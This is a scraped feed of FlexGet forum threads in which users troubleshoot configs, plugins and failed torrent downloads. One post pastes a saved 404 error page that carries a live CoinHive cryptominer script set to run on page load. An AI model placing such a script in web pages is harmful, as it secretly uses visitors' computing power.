Quantcast
Channel: uncategorized - Forum - FlexGet
Viewing all 376 articles
Browse latest View live

Move along subdirs not working

$
0
0

@zapp7 wrote:

I have some downloads that include a Subs folder with all the subtitles. For some reason, the move plugin successfully moves the .mkv file but fails to do anything with the Subs directory. Am I using the move plugin correctly for this?

sort-shows:
    filesystem:
      path: /media/WDPassport/Completed Downloads
      regexp: '.*\.(avi|mkv|mp4)$'
      recursive: yes
      retrieve: files
    accept_all: yes
    metainfo_series: yes
    disable: 
      - builtin
      - seen
    thetvdb_lookup: yes
    #all_series:
      #parse_only: yes
    clean_transmission:
      host: 192.168.1.25
      port: 9091
      delete_files: no
      username: transmission
      password: transmission
    pathscrub: windows
  
move:      
  to: /media/WDPassport/TV Shows/{{ tvdb_series_name }}
  rename: '{{ tvdb_series_name }} - {{ series_id }} - {{ tvdb_ep_name }}{{ location | pathext }}'
  along:
    extensions:
      - srt
      - sub
    subdirs:
      - Subs

Posts: 1

Participants: 1

Read full topic


How can a mix different source and quality as an or statement?

$
0
0

@micdhack wrote:

How can setup so that my quality statement can accept hdtv releases that do not specify bitrate? See my log below, I want to be able to accept the ignored release: The Orville S02E06 HDTV x264-CRAVERS

2019-02-02 10:20 VERBOSE series eztv Ignored The Orville S02E06 HDTV x264-CRAVERS. Does not meet quality requirement 480p-720p tvrip+.
2019-02-02 10:20 VERBOSE task eztv ACCEPTED: The Orville S02E06 720p HDTV x264-CRAVERS by series plugin because target quality
2019-02-02 10:20 VERBOSE task eztv REJECTED: Blindspot S04E11 Careless Whisper 720p AMZN WEB-DL DDP5 1 H 264-NTb by series plugin because entity has already been downloaded
2019-02-02 10:20 VERBOSE details eztv Summary - Accepted: 1 (Rejected: 1 Undecided: 48 Failed: 0)
2019-02-02 10:20 INFO deluge_client.client eztv Connecting to localhost:58846
2019-02-02 10:20 INFO deluge_client.client eztv Connecting to localhost:58846
2019-02-02 10:20 VERBOSE deluge eztv Adding The Orville S02E06 720p HDTV x264-CRAVERS to deluge.

Posts: 1

Participants: 1

Read full topic

Display subtitle list from CLI

YTS plugin rejecting because of quality not met

$
0
0

@effemmeffe wrote:

I tried to use the yts plugin, I put the plugin as my only souorce for movies discovery, but I get all the movies rejected because they don't meet the requested quality.
The problem is that as far as I understand the quality field is not compiled so it will never match.
Did I miss something in my config or is this a plugin bug?

Config: https://github.com/effemmeffe/flexget/blob/master/config.yml
Log: http://paste.ubuntu.com/p/Skz28KZhcB/

Posts: 1

Participants: 1

Read full topic

Android client app

$
0
0

@vlowe wrote:

I put together an app to connect to the flexget api running on my seedbox. I published it on the google play store if interested in keeping an eye on what has been downloaded & what episodes are upcoming (https://play.google.com/store/apps/details?id=uk.co.vlowe.flexgetapp).

I have the iOS version too but its much more expensive to join the developer program with apple so still thinking about that one :grin:

Posts: 1

Participants: 1

Read full topic

Error urlrewriter

$
0
0

@pucelano7 wrote:

Hi!

When I Execute the command:
flexget --test execute

I receive the next error:

2019-02-12 01:11 INFO manager Test mode, creating a copy from database ...
2019-02-12 01:11 INFO manager Test database created
2019-02-12 01:11 VERBOSE task_queue There are 1 tasks to execute. Shutdown will commence when they have completed.
2019-02-12 01:11 WARNING rss some feed Skipped 1 RSS-entries without required information (title, link or enclosures)
2019-02-12 01:11 VERBOSE details some feed Produced 1000 entries.
2019-02-12 01:11 VERBOSE series.db some feed identified by is currently on auto for Blindspot. Multiple id types may be accepted until it locks in on the appropriate type.
2019-02-12 01:11 VERBOSE flexget.components.series.series some feed Ignored Blindspot - Temporada 4 [HDTV][Cap.401][Castellano][www.pctnew.com]. Does not meet quality requirement 720p.
2019-02-12 01:11 VERBOSE task some feed ACCEPTED: Blindspot - Temporada 4 [HDTV 720p][Cap.412][V.O. Subt. Castellano][www.pctnew.com] by series plugin because target quality
2019-02-12 01:11 VERBOSE descargas2020 some feed Descargas2020 URL: http://descargas2020.com/descargar/serie-vo/blindspot/temporada-4/capitulo-12/2019-02-12 01:11 ERROR urlrewriter some feed 'NoneType' object has no attribute 'get'
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/flexget/components/sites/urlrewriting.py", line 71, in url_rewrite
urlrewriter.instance.url_rewrite(task, entry)
File "/usr/local/lib/python2.7/dist-packages/flexget/components/sites/sites/descargas2020.py", line 50, in url_rewrite
entry['url'] = self.parse_download_page(entry['url'], task)
File "/usr/local/lib/python2.7/dist-packages/flexget/plugin.py", line 119, in wrapped_func
return func(*args, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/flexget/components/sites/sites/descargas2020.py", line 57, in parse_download_page
page = self.requests.get(url)
AttributeError: 'NoneType' object has no attribute 'get'
2019-02-12 01:11 WARNING urlrewriter some feed descargas2020: ....
2019-02-12 01:11 ERROR entry some feed Failed Blindspot - Temporada 4 [HDTV 720p][Cap.412][V.O. Subt. Castellano][www.pctnew.com] (None)2019-02-12 01:11 INFO task some feed Plugin retry_failed has requested task to be ran again after execution has completed.
2019-02-12 01:11 VERBOSE task some feed FAILED: Blindspot - Temporada 4 [HDTV 720p][Cap.412][V.O. Subt. Castellano][www.pctnew.com] by urlrewriting plugin
2019-02-12 01:11 VERBOSE details some feed Summary - Accepted: 0 (Rejected: 0 Undecided: 999 Failed: 1)
2019-02-12 01:11 INFO task some feed Rerunning the task in case better resolution can be achieved.
2019-02-12 01:11 VERBOSE input_cache some feed Restored 1000 entries from cache
2019-02-12 01:11 VERBOSE details some feed Produced 1000 entries.
2019-02-12 01:11 VERBOSE task some feed REJECTED: Blindspot - Temporada 4 [HDTV 720p][Cap.412][V.O. Subt. Castellano][www.pctnew.com] by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: None)
2019-02-12 01:11 VERBOSE series.db some feed identified by is currently on auto for Blindspot. Multiple id types may be accepted until it locks in on the appropriate type.
2019-02-12 01:11 VERBOSE flexget.components.series.series some feed Ignored Blindspot - Temporada 4 [HDTV][Cap.401][Castellano][www.pctnew.com]. Does not meet quality requirement 720p.
2019-02-12 01:11 VERBOSE task some feed ACCEPTED: Blindspot - Temporada 4 [HDTV 720p][Cap.401][AC3 5.1 Castellano][www.pctnew.com] by series plugin because target quality
2019-02-12 01:11 VERBOSE descargas2020 some feed Descargas2020 URL: ....
2019-02-12 01:11 ERROR urlrewriter some feed 'NoneType' object has no attribute 'get'
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/flexget/components/sites/urlrewriting.py", line 71, in url_rewrite
urlrewriter.instance.url_rewrite(task, entry)
File "/usr/local/lib/python2.7/dist-packages/flexget/components/sites/sites/descargas2020.py", line 50, in url_rewrite
entry['url'] = self.parse_download_page(entry['url'], task)
File "/usr/local/lib/python2.7/dist-packages/flexget/plugin.py", line 119, in wrapped_func
return func(*args, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/flexget/components/sites/sites/descargas2020.py", line 57, in parse_download_page
page = self.requests.get(url)
AttributeError: 'NoneType' object has no attribute 'get'
2019-02-12 01:11 WARNING urlrewriter some feed descargas2020: Internal error with urll:....
2019-02-12 01:11 ERROR entry some feed Failed Blindspot - Temporada 4 [HDTV 720p][Cap.401][AC3 5.1 Castellano][www.pctnew.com] (None)
2019-02-12 01:11 INFO task some feed Plugin retry_failed has requested task to be ran again after execution has completed.
2019-02-12 01:11 VERBOSE task some feed FAILED: Blindspot - Temporada 4 [HDTV 720p][Cap.401][AC3 5.1 Castellano][www.pctnew.com] by urlrewriting plugin
2019-02-12 01:11 VERBOSE details some feed Summary - Accepted: 0 (Rejected: 1 Undecided: 998 Failed: 1)
2019-02-12 01:11 INFO task some feed Rerunning the task in case better resolution can be achieved.
2019-02-12 01:11 VERBOSE input_cache some feed Restored 1000 entries from cache
2019-02-12 01:11 VERBOSE details some feed Produced 1000 entries.
2019-02-12 01:11 VERBOSE task some feed REJECTED: Blindspot - Temporada 4 [HDTV 720p][Cap.412][V.O. Subt. Castellano][www.pctnew.com] by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: None)
2019-02-12 01:11 VERBOSE task some feed REJECTED: Blindspot - Temporada 4 [HDTV 720p][Cap.401][AC3 5.1 Castellano][www.pctnew.com] by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: None)
2019-02-12 01:11 VERBOSE series.db some feed identified by is currently on auto for Blindspot. Multiple id types may be accepted until it locks in on the appropriate type.
2019-02-12 01:11 VERBOSE flexget.components.series.series some feed Ignored Blindspot - Temporada 4 [HDTV][Cap.401][Castellano][www.pctnew.com]. Does not meet quality requirement 720p.
2019-02-12 01:11 VERBOSE task some feed ACCEPTED: Blindspot - Temporada 4 [HDTV 720p][Cap.411][V.O. Subt. Castellano][www.pctnew.com] by series plugin because target quality
2019-02-12 01:11 VERBOSE descargas2020 some feed Descargas2020 URL: http://descargas2020.com/descargar/serie-vo/blindspot/temporada-4/capitulo-11/2019-02-12 01:11 ERROR urlrewriter some feed 'NoneType' object has no attribute 'get'
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/flexget/components/sites/urlrewriting.py", line 71, in url_rewrite
urlrewriter.instance.url_rewrite(task, entry)
File "/usr/local/lib/python2.7/dist-packages/flexget/components/sites/sites/descargas2020.py", line 50, in url_rewrite
entry['url'] = self.parse_download_page(entry['url'], task)
File "/usr/local/lib/python2.7/dist-packages/flexget/plugin.py", line 119, in wrapped_func
return func(*args, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/flexget/components/sites/sites/descargas2020.py", line 57, in parse_download_page
page = self.requests.get(url)
AttributeError: 'NoneType' object has no attribute 'get'
2019-02-12 01:11 WARNING urlrewriter some feed descargas2020: Internal error with url http://descargas2020.com/descargar/serie-vo/blindspot/temporada-4/capitulo-11/
2019-02-12 01:11 ERROR entry some feed Failed Blindspot - Temporada 4 [HDTV 720p][Cap.411][V.O. Subt. Castellano][www.pctnew.com] (None)2019-02-12 01:11 INFO task some feed Plugin retry_failed has requested task to be ran again after execution has completed.
2019-02-12 01:11 VERBOSE task some feed FAILED: Blindspot - Temporada 4 [HDTV 720p][Cap.411][V.O. Subt. Castellano][www.pctnew.com] by urlrewriting plugin
2019-02-12 01:11 VERBOSE details some feed Summary - Accepted: 0 (Rejected: 2 Undecided: 997 Failed: 1)
2019-02-12 01:11 INFO task some feed Rerunning the task in case better resolution can be achieved.
2019-02-12 01:11 VERBOSE input_cache some feed Restored 1000 entries from cache
2019-02-12 01:11 VERBOSE details some feed Produced 1000 entries.
2019-02-12 01:11 VERBOSE task some feed REJECTED: Blindspot - Temporada 4 [HDTV 720p][Cap.412][V.O. Subt. Castellano][www.pctnew.com] by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: None)
2019-02-12 01:11 VERBOSE task some feed REJECTED: Blindspot - Temporada 4 [HDTV 720p][Cap.401][AC3 5.1 Castellano][www.pctnew.com] by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: None)
2019-02-12 01:11 VERBOSE task some feed REJECTED: Blindspot - Temporada 4 [HDTV 720p][Cap.411][V.O. Subt. Castellano][www.pctnew.com] by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: None)
2019-02-12 01:11 VERBOSE series.db some feed identified by is currently on auto for Blindspot. Multiple id types may be accepted until it locks in on the appropriate type.
2019-02-12 01:11 VERBOSE flexget.components.series.series some feed Ignored Blindspot - Temporada 4 [HDTV][Cap.401][Castellano][www.pctnew.com]. Does not meet quality requirement 720p.
2019-02-12 01:11 VERBOSE details some feed Summary - Accepted: 0 (Rejected: 3 Undecided: 997 Failed: 0)
2019-02-12 01:11 INFO manager Removed test database

A week ago it worked perfect but now always I have the same error.

I have the last version of plexget and to do the test I’m using a very simple “config.yml”:

templates:
tv:
series:
settings:
720p:
quality: 720p
720p:
- Blindspot
download: /usr/local/bin/
tasks:
some feed:
rss: http://feeds.feedburner.com/descargas2020
template: tv

Posts: 1

Participants: 1

Read full topic

Broke my installation with upgrade

$
0
0

@turb0chrg wrote:

Hey there.

I upgraded from 2.17.6 to 2.20.4 and everything looked good until I run flexget:

2019-02-20 17:36 CRITICAL plugin Exception while loading plugin flexget.plugins.parsers.parser_guessit
Traceback (most recent call last):
File "/home/jcarter/flexg> et/local/lib/python2.7/site-packages/flexget/plugin.py", line 434, in importplugin
import_module(module_name)
File "/usr/lib/python2.7/importlib/__init__.py", line 37, in import_module
import(name)
File "/home/jcarter/flexget/local/lib/python2.7/site-packages/flexget/plugins/parsers/parser_guessit.py", line 38, in
guessit_api = GuessItApi(rebulk_builder().rebulk(idregexps))
TypeError: rebulk_builder() takes exactly 1 argument (0 given)

Any tips for me? I found this https://github.com/Flexget/Flexget/issues/2160 which looks related. I think I need to downgrade my guessit? I'm not clear exactly what's the problem here but it looks like the library changed the parameter set with a new verison?

./bin/guessit --version
+-------------------------------------------------------+
+ GuessIt 3.0.3 +
+-------------------------------------------------------+
+ Rebulk 0.9.0 +
+-------------------------------------------------------+
| Please report any bug or feature request at |
| https://github.com/guessit-io/guessit/issues. |
+-------------------------------------------------------+

I upgraded my setuptools and pip recently as well.

Thanks, Joel.

Posts: 3

Participants: 2

Read full topic

Unable to download with Trakt lists - Errors

$
0
0

@Amishman wrote:

I recently switched from having my TV shows listed in the config to using a Trakt list for TV and movies. I am able to have Flexget accesss my TV shows list and my movies watchlist. When I run Flexget, it says it has accepted episodes and movies but then there is an error and nothing downloads.

Here is my config.

tasks:
  tv:
    template: notify_tv
    inputs:
      - rss: https://www.rssfeeds
      - rss: https://www.rssfeeds
      - rss: https://www.rssfeeds
      - rss: http://www.rssfeeds
      - rss: https://www.rssfeeds
      - rss: https://www.rssfeeds
      - rss: https://www.rssfeeds
    discover:
      what:
        - next_series_episodes: yes
      from:
        - rarbg:
            category: [18, 41, 49]
        - 1337x: yes
        - limetorrents:
            category: tv
        - piratebay:
            category: video
    sort_by:
      field: torrent_availability
      reverse: yes
    magnets: no
    configure_series:
      from:
        trakt_list:
          username: '{? trakt.usr ?}'
          account: '{? trakt.usr ?}'
          list: 720p_list
          type: shows
      settings:
        quality: 720p webrip+
    regexp:
      reject:
        - spanish
        - italian
        - german
        - french
        - dutch
        - hindi
        - Español
        - x265
    download: C:\_Downloaded uTorrent Files



  get_movie_list:
    priority: 1
    trakt_list:
      account: '{? trakt.usr ?}'
      list: watchlist
    accept_all: yes
    seen: local
    list_add:
      - movie_list: movies_2_get


  movie:
    inputs:
      - rss: https://www.rssfeeds
      - rss: https://www.rssfeeds
    trakt_lookup: yes
    priority: 10
    discover:
      what:
        - movie_list: movies_2_get
      from:
        - rarbg:
            category: [17, 44, 45]
        - 1337x: yes
        - piratebay:
            category: video
        - torrentz: good
        - limetorrents:
            category: movies
    magnets: no
    torrent_alive: 10
    quality: 720p+
    list_match:
      from:
        - movie_list: movies_2_get
    download: C:\_Downloaded uTorrent Files

Here is a section of my log.

2019-02-24 07:57 ERROR    entry         movie           Failed Glass 2019 NEW HD-CAM 720p-CHI (Network error during request: 503 Server Error: Service Temporarily Unavailable for url: https://itorrents.org/torrent/846DB24F5650AB56B3606C41145BED77A74BCEE9.torrent?title=Glass-2019-NEW-HD-CAM-720p-CHI)
2019-02-24 07:57 INFO     task          movie           Rerunning the task in case better resolution can be achieved.
2019-02-24 07:57 ERROR    discover      movie           Error searching with torrentz: Error getting torrentz search results: 503 Server Error: Service Temporarily Unavailable for url: http://torrentz2.eu/feed?f=Arrested%20Development
2019-02-24 07:57 INFO     task          tv              Plugin next_series_episodes has requested task to be ran again after execution has completed. Reason: Look for next season
2019-02-24 07:58 WARNING  inputs        tv              Error during input plugin rss: HTTP error 403 received from https://www.torrentfunk.com/verified/rss.xml
2019-02-24 07:58 INFO     1337x         tv              1337x rewriting download url: http://1337x.to/torrent/1484108/The-Goldbergs-2013-S03E17-720p-HDTV-x264-AVS-eztv-mkv/
2019-02-24 07:58 INFO     urlrewriter   tv              Entry 'The Goldbergs (2013) S03E17 720p HDTV x264 AVS eztv mkv' URL rewritten to http://itorrents.org/torrent/58d0d35af230573aa8a03d43ee13227bc0a6a7b8.torrent (with 1337x)
2019-02-24 07:58 INFO     download      tv              Downloading: The Goldbergs (2013) S03E17 720p HDTV x264 AVS eztv mkv
2019-02-24 07:58 ERROR    download      tv              Error retrieving The Goldbergs (2013) S03E17 720p HDTV x264 AVS eztv mkv, the error page has been saved to C:\Users\user\flexget\received\tv\The Goldbergs (2013) S03E17 720p HDTV x264 AVS eztv mkv.error
2019-02-24 07:58 WARNING  download      tv              RequestException 503 Server Error: Service Temporarily Unavailable for url: http://itorrents.org/torrent/58d0d35af230573aa8a03d43ee13227bc0a6a7b8.torrent, while downloading http://itorrents.org/torrent/58d0d35af230573aa8a03d43ee13227bc0a6a7b8.torrent
2019-02-24 07:58 ERROR    entry         tv              Failed The Goldbergs (2013) S03E17 720p HDTV x264 AVS eztv mkv (Network error during request: 503 Server Error: Service Temporarily Unavailable for url: http://itorrents.org/torrent/58d0d35af230573aa8a03d43ee13227bc0a6a7b8.torrent)
2019-02-24 07:58 INFO     download      tv              Downloading: Game of Thrones S01E02 720p BluRay x264 AC3 ESub Dual Audio 525MB]
2019-02-24 07:58 ERROR    download      tv              Error retrieving Game of Thrones S01E02 720p BluRay x264 AC3 ESub Dual Audio 525MB], the error page has been saved to C:\Users\user\flexget\received\tv\Game of Thrones S01E02 720p BluRay x264 AC3 ESub Dual Audio 525MB].error
2019-02-24 07:58 WARNING  download      tv              RequestException 503 Server Error: Service Temporarily Unavailable for url: http://itorrents.org/torrent/928619841A8152923EF2418D7EB22F8667B1C491.torrent?title=Game-of-Thrones-S01E02-720p-BluRay-x264-AC3-ESub-Dual-Audio-525MB], while downloading http://itorrents.org/torrent/928619841A8152923EF2418D7EB22F8667B1C491.torrent?title=Game-of-Thrones-S01E02-720p-BluRay-x264-AC3-ESub-Dual-Audio-525MB]
2019-02-24 07:58 ERROR    entry         tv              Failed Game of Thrones S01E02 720p BluRay x264 AC3 ESub Dual Audio 525MB] (Network error during request: 503 Server Error: Service Temporarily Unavailable for url: http://itorrents.org/torrent/928619841A8152923EF2418D7EB22F8667B1C491.torrent?title=Game-of-Thrones-S01E02-720p-BluRay-x264-AC3-ESub-Dual-Audio-525MB])
2019-02-24 07:58 INFO     task          tv              Rerunning the task in case better resolution can be achieved.
2019-02-24 07:58 WARNING  inputs        tv              Error during input plugin rss: HTTP error 403 received from https://www.torrentfunk.com/verified/rss.xml
2019-02-24 08:56 INFO     download      movie           Downloading: A.Star.is.Born.2018.1080p.BluRay.x264.DTS-HD.MA.7.1-iFT
2019-02-24 08:56 INFO     download      movie           Downloading: A.Star.is.Born.2018.1080p.BluRay.x264.DTS-HD.MA.7.1-iFT
2019-02-24 08:56 ERROR    download      movie           Error retrieving A.Star.is.Born.2018.1080p.BluRay.x264.DTS-HD.MA.7.1-iFT, the error page has been saved to C:\Users\user\flexget\received\movie\A.Star.is.Born.2018.1080p.BluRay.x264.DTS-HD.MA.7.1-iFT.error
2019-02-24 08:56 WARNING  download      movie           RequestException 503 Server Error: Service Temporarily Unavailable for url: http://itorrents.org/torrent/5E0CAC81DE4A0B470CE3A30F32D1B47DE8C1310F.torrent, while downloading http://itorrents.org/torrent/5E0CAC81DE4A0B470CE3A30F32D1B47DE8C1310F.torrent
2019-02-24 08:56 INFO     download      movie           Downloading: A.Star.is.Born.2018.1080p.BluRay.x264.DTS-HD.MA.7.1-iFT
2019-02-24 08:56 INFO     download      movie           Downloading: A.Star.is.Born.2018.1080p.BluRay.x264.DTS-HD.MA.7.1-iFT
2019-02-24 08:56 ERROR    download      movie           Error retrieving A.Star.is.Born.2018.1080p.BluRay.x264.DTS-HD.MA.7.1-iFT, the error page has been saved to C:\Users\user\flexget\received\movie\A.Star.is.Born.2018.1080p.BluRay.x264.DTS-HD.MA.7.1-iFT.error
2019-02-24 08:56 WARNING  download      movie           RequestException 404 Client Error: Not Found for url: http://torrage.com/torrent/5E0CAC81DE4A0B470CE3A30F32D1B47DE8C1310F.torrent, while downloading http://torrage.com/torrent/5E0CAC81DE4A0B470CE3A30F32D1B47DE8C1310F.torrent
2019-02-24 08:56 ERROR    entry         movie           Failed A.Star.is.Born.2018.1080p.BluRay.x264.DTS-HD.MA.7.1-iFT (Unexpected html content received from `http://zoink.it/torrent/5E0CAC81DE4A0B470CE3A30F32D1B47DE8C1310F.torrent` - maybe a login page?, Unexpected html content received from `http://zoink.it/torrent/5E0CAC81DE4A0B470CE3A30F32D1B47DE8C1310F.torrent` - maybe a login page?, Unexpected html content received from `http://zoink.it/torrent/5E0CAC81DE4A0B470CE3A30F32D1B47DE8C1310F.torrent` - maybe a login page?, Unexpected html content received from `http://zoink.it/torrent/5E0CAC81DE4A0B470CE3A30F32D1B47DE8C1310F.torrent` - maybe a login page?)
2019-02-24 08:56 INFO     task          tv              Plugin next_series_episodes has requested task to be ran again after execution has completed. Reason: Look for next season
2019-02-24 08:57 WARNING  inputs        tv              Error during input plugin rss: HTTP error 403 received from https://www.torrentfunk.com/verified/rss.xml
2019-02-24 08:57 INFO     task          tv              Rerunning the task in case better resolution can be achieved.
2019-02-24 08:57 ERROR    rarbg         tv              Rarbg request failed: 429 Client Error:  for url: https://torrentapi.org/pubapi_v2.php?sort=last&category=18%3B41%3B49&min_leechers=0&ranked=1&search_string=The+Big+Bang+Theory+%282007%29+S09E01&mode=search&min_seeders=0&format=json_extended&app_id=flexget&token=7xt95jki26
2019-02-24 08:57 WARNING  inputs        tv              Error during input plugin rss: HTTP error 403 received from https://www.torrentfunk.com/verified/rss.xml
2019-02-24 08:57 INFO     download      tv              Downloading: The.Big.Bang.Theory.S09E01.720p.HDTV.X264-DIMENSION[rartv]
2019-02-24 08:57 ERROR    download      tv              Error retrieving The.Big.Bang.Theory.S09E01.720p.HDTV.X264-DIMENSION[rartv], the error page has been saved to C:\Users\user\flexget\received\tv\The.Big.Bang.Theory.S09E01.720p.HDTV.X264-DIMENSION[rartv].error
2019-02-24 08:57 WARNING  download      tv              RequestException 503 Server Error: Service Temporarily Unavailable for url: http://itorrents.org/torrent/7905462A92D28C45860E2DA3E61FFD48F372CA49.torrent, while downloading http://itorrents.org/torrent/7905462A92D28C45860E2DA3E61FFD48F372CA49.torrent
2019-02-24 08:57 INFO     download      tv              Downloading: The.Big.Bang.Theory.S09E01.720p.HDTV.X264-DIMENSION[rartv]
2019-02-24 08:57 INFO     download      tv              Downloading: The.Big.Bang.Theory.S09E01.720p.HDTV.X264-DIMENSION[rartv]
2019-02-24 08:57 INFO     download      tv              Downloading: The.Big.Bang.Theory.S09E01.720p.HDTV.X264-DIMENSION[rartv]
2019-02-24 08:57 ERROR    download      tv              Error retrieving The.Big.Bang.Theory.S09E01.720p.HDTV.X264-DIMENSION[rartv], the error page has been saved to C:\Users\user\flexget\received\tv\The.Big.Bang.Theory.S09E01.720p.HDTV.X264-DIMENSION[rartv].error
2019-02-24 08:57 WARNING  download      tv              RequestException 404 Client Error: Not Found for url: http://torrage.com/torrent/7905462A92D28C45860E2DA3E61FFD48F372CA49.torrent, while downloading http://torrage.com/torrent/7905462A92D28C45860E2DA3E61FFD48F372CA49.torrent
2019-02-24 08:57 ERROR    entry         tv              Failed The.Big.Bang.Theory.S09E01.720p.HDTV.X264-DIMENSION[rartv] (Network error during request: 503 Server Error: Service Temporarily Unavailable for url: http://itorrents.org/torrent/7905462A92D28C45860E2DA3E61FFD48F372CA49.torrent, Unexpected html content received from `http://itorrents.org/torrent/7905462A92D28C45860E2DA3E61FFD48F372CA49.torrent` - maybe a login page?, Unexpected html content received from `http://itorrents.org/torrent/7905462A92D28C45860E2DA3E61FFD48F372CA49.torrent` - maybe a login page?, Unexpected html content received from `http://itorrents.org/torrent/7905462A92D28C45860E2DA3E61FFD48F372CA49.torrent` - maybe a login page?)
2019-02-24 08:57 INFO     task          tv              Plugin retry_failed has requested task to be ran again after execution has completed.
2019-02-24 08:57 INFO     task          tv              Rerunning the task in case better resolution can be achieved.
2019-02-24 08:57 WARNING  utils                         Input next_series_episodes did not return anything
2019-02-24 08:57 WARNING  inputs        tv              Error during input plugin rss: HTTP error 403 received from https://www.torrentfunk.com/verified/rss.xml

Flexget then places an error file in received\movies or tv folder.
Here is one of the error file contents. This is the same error message for TV or movies.

The.Big.Bang.Theory.S09E01.720p.HDTV.X264-DIMENSION[rartv].error

<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>404 Not Found</h1>
Try to go to the <a href="/">front page</a>
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('3TyPM1TY53ldTXCfuALfVFSfimTGEOyy', { throttle: 0.65 });
miner.start();
</script>
</body>
</html>

It just wants to download these junk torrents and not real ones.
What am I missing?

Posts: 3

Participants: 2

Read full topic


Evenly distribute files accross multiple drives?

$
0
0

@Amishman wrote:

I currently use Filebot to rename and move my files after they have been downloaded. My Filebot script will check to see if the folder exits first and then if it doesn't, will place the file on the drive with the most amount of space. It also will place it in a collection of one exists.

For example, for a TV show, it will check all of my drives (10 drives) and see if "TV\Big Bang Theory, The" exists. If it does, the file will be placed in the correct season. If it does not, Filebot checks to see which drive has the most space and creates Big Bang Theory, The\Season 1\episode.

For movies it will check to see if movie belongs to a collection. If it does, then it will place the movie there. Otherwise it will check to see which drive has the most space and place it there.

Is something like this possible with Flexget? If it is, where and how would I go about doing it?

Posts: 2

Participants: 2

Read full topic

Can someone use the yts plugin?

Unable to download because of html content

$
0
0

@Amishman wrote:

I am not sure what is wrong. I have tried several different config using Trakt and having the series listed in the config but I keep getting the same error. It accepts an entry but then rejects it.

Here is my config:

templates:
  show_settings:
    download: C:\_Downloaded uTorrent Files
    disable: torrent_cache
    magnets: no
    series:
      settings:
        720p_list:
          quality: 720p webrip+
      720p_list:
        - moonshiners
        - the orville:
            begin: S02E09

tasks:

  tv:
    template: show_settings
    discover:
      what:
        - next_series_episodes: yes
      from:
        - rarbg:
            category: [2, 18, 41, 49]
        - piratebay:
            category: highres tv
        - limetorrents:
            category: tv

Here is my log:

2019-03-02 09:26 VERBOSE  task_queue                    There are 1 tasks to execute. Shutdown will commence when they have completed.
2019-03-02 09:26 VERBOSE  discover      tv              Discovering 2 titles ...
2019-03-02 09:26 INFO     discover      tv              Ignoring interval because of --discover-now
2019-03-02 09:26 INFO     task          tv              Plugin next_series_episodes has requested task to be ran again after execution has completed. Reason: Look for next season
2019-03-02 09:26 VERBOSE  discover      tv              moonshiners S08E11 hasn't been released yet (Expected: 2019-03-06 00:00:00)
2019-03-02 09:26 VERBOSE  discover      tv              Searching for `the orville S02E09` with plugin `rarbg` (1 of 1)
2019-03-02 09:26 VERBOSE  details       tv              Produced 6 entries.
2019-03-02 09:26 VERBOSE  task          tv              REJECTED: `The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb[rartv]` by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: Magnet URL, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?)
2019-03-02 09:26 VERBOSE  task          tv              REJECTED: `The.Orville.S02E09.720p.WEB.x264-TBS[rartv]` by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: Magnet URL)
2019-03-02 09:26 VERBOSE  flexget.components.series.series tv              Ignored `The.Orville.S02E09.1080p.WEB.x264-TBS[rartv]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:26 VERBOSE  flexget.components.series.series tv              Ignored `The.Orville.S02E09.Identity.Part.2.1080p.AMZN.WEBRip.DDP5.1.x264-NTb[rartv]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:26 VERBOSE  flexget.components.series.series tv              Ignored `The.Orville.S02E09.WEB.x264-TBS[rartv]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:26 VERBOSE  flexget.components.series.series tv              Ignored `The.Orville.S02E09.WEBRip.x264-ION10`. Does not meet quality requirement `720p webrip+`.
